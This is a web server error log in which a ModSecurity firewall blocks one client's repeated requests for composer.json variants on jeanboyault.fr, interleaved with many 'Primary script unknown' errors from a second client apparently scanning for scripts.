[Mon May 11 12:37:03.089711 2026] [security2:error] [pid 1254212:tid 1254236] [client 185.177.72.9:28054] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /chat/composer.json.draft"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/chat/composer.json.draft"] [unique_id "agGxT0YQeUtAPynIs6xorwAAABY"]
[Mon May 11 12:37:03.089919 2026] [security2:error] [pid 1254212:tid 1254236] [client 185.177.72.9:28054] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/chat/composer.json.draft"] [unique_id "agGxT0YQeUtAPynIs6xorwAAABY"]
[Mon May 11 12:37:04.315499 2026] [security2:error] [pid 1254212:tid 1254236] [client 185.177.72.9:28054] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGxT0YQeUtAPynIs6xorwAAABY"]
[Mon May 11 12:37:09.235061 2026] [security2:error] [pid 1254179:tid 1254194] [client 185.177.72.9:58518] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /composer.json.draft"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/composer.json.draft"] [unique_id "agGxVWS6k_SCYd1AVZq_YwAAAQ0"]
[Mon May 11 12:37:09.235294 2026] [security2:error] [pid 1254179:tid 1254194] [client 185.177.72.9:58518] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/composer.json.draft"] [unique_id "agGxVWS6k_SCYd1AVZq_YwAAAQ0"]
[Mon May 11 12:37:10.421532 2026] [security2:error] [pid 1254179:tid 1254194] [client 185.177.72.9:58518] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGxVWS6k_SCYd1AVZq_YwAAAQ0"]
[Mon May 11 12:37:10.447214 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.177.72.9:58520] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /composer.json.draft"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/composer.json.draft"] [unique_id "agGxVkYQeUtAPynIs6xouQAAAAU"]
[Mon May 11 12:37:10.447437 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.177.72.9:58520] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/composer.json.draft"] [unique_id "agGxVkYQeUtAPynIs6xouQAAAAU"]
[Mon May 11 12:37:11.675486 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.177.72.9:58520] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGxVkYQeUtAPynIs6xouQAAAAU"]
[Mon May 11 12:37:11.702829 2026] [security2:error] [pid 1254328:tid 1254353] [client 185.177.72.9:58522] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /composer.json.orig"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/composer.json.orig"] [unique_id "agGxV0Rdw2n9wv6Ai48XiwAAAJg"]
[Mon May 11 12:37:11.703040 2026] [security2:error] [pid 1254328:tid 1254353] [client 185.177.72.9:58522] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/composer.json.orig"] [unique_id "agGxV0Rdw2n9wv6Ai48XiwAAAJg"]
[Mon May 11 12:37:12.877304 2026] [security2:error] [pid 1254328:tid 1254353] [client 185.177.72.9:58522] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGxV0Rdw2n9wv6Ai48XiwAAAJg"]
[Mon May 11 12:37:12.903429 2026] [security2:error] [pid 1254179:tid 1254181] [client 185.177.72.9:58524] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /composer.json.orig"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/composer.json.orig"] [unique_id "agGxWGS6k_SCYd1AVZq_ZAAAAQA"]
[Mon May 11 12:37:12.903650 2026] [security2:error] [pid 1254179:tid 1254181] [client 185.177.72.9:58524] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/composer.json.orig"] [unique_id "agGxWGS6k_SCYd1AVZq_ZAAAAQA"]
[Mon May 11 12:37:14.123245 2026] [security2:error] [pid 1254179:tid 1254181] [client 185.177.72.9:58524] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGxWGS6k_SCYd1AVZq_ZAAAAQA"]
[Mon May 11 12:37:29.915722 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:30.011725 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:30.122861 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:30.230639 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:30.348529 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:30.445666 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:30.541965 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:30.637962 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:30.967012 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:31.366861 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:31.464793 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:31.677324 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:31.802384 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:31.968127 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:32.067287 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:32.163631 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:32.280080 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:32.416170 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:32.515217 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:32.622999 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:32.959214 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:33.057060 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:33.444546 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:33.541806 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:33.638374 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:34.144820 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:34.485984 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:34.613140 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:35.245978 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:35.393710 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:35.538561 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:35.634933 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:35.733765 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:35.830431 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:35.937069 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:36.058237 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:36.171400 2026] [security2:error] [pid 1254328:tid 1254337] [client 185.177.72.9:41572] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /django/composer.json.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/django/composer.json.sample"] [unique_id "agGxcERdw2n9wv6Ai48XzQAAAIY"]
[Mon May 11 12:37:36.171605 2026] [security2:error] [pid 1254328:tid 1254337] [client 185.177.72.9:41572] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/django/composer.json.sample"] [unique_id "agGxcERdw2n9wv6Ai48XzQAAAIY"]
[Mon May 11 12:37:36.289842 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:36.386418 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:36.492110 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:36.593383 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:36.865423 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:37.006055 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:37.202306 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:37.298529 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:37.328900 2026] [security2:error] [pid 1254328:tid 1254337] [client 185.177.72.9:41572] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGxcERdw2n9wv6Ai48XzQAAAIY"]
[Mon May 11 12:37:37.354278 2026] [security2:error] [pid 1256241:tid 1256248] [client 185.177.72.9:41582] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /django/composer.json.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/django/composer.json.sample"] [unique_id "agGxcZkIEwRJMyDaV55ebwAAAUI"]
[Mon May 11 12:37:37.354485 2026] [security2:error] [pid 1256241:tid 1256248] [client 185.177.72.9:41582] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/django/composer.json.sample"] [unique_id "agGxcZkIEwRJMyDaV55ebwAAAUI"]
[Mon May 11 12:37:37.476728 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:37.573033 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:37.674144 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:37.780395 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:37.876671 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:38.059162 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:38.323838 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:38.451211 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:38.550433 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:38.551704 2026] [security2:error] [pid 1256241:tid 1256248] [client 185.177.72.9:41582] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGxcZkIEwRJMyDaV55ebwAAAUI"]
[Mon May 11 12:37:38.671394 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:39.022364 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:39.226042 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:39.332132 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:39.526810 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:39.667431 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:39.841003 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:40.067908 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:40.163900 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:40.787131 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:41.982897 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:42.100940 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:42.308883 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:42.424593 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:42.623786 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:42.725994 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:43.130254 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:43.227036 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:44.032676 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:44.253617 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:44.866576 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:44.963634 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:45.192260 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:45.294929 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:45.508145 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:45.604694 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:45.701349 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:45.798892 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:46.028575 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:46.366719 2026] [proxy_fcgi:error] [pid 1254179:tid 1254204] [client 20.151.0.198:64498] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:46.918711 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:47.020642 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:47.121965 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
[Mon May 11 12:37:47.224269 2026] [proxy_fcgi:error] [pid 1254133:tid 1254151] [client 20.151.0.198:64466] AH01071: Got error 'Primary script unknown'
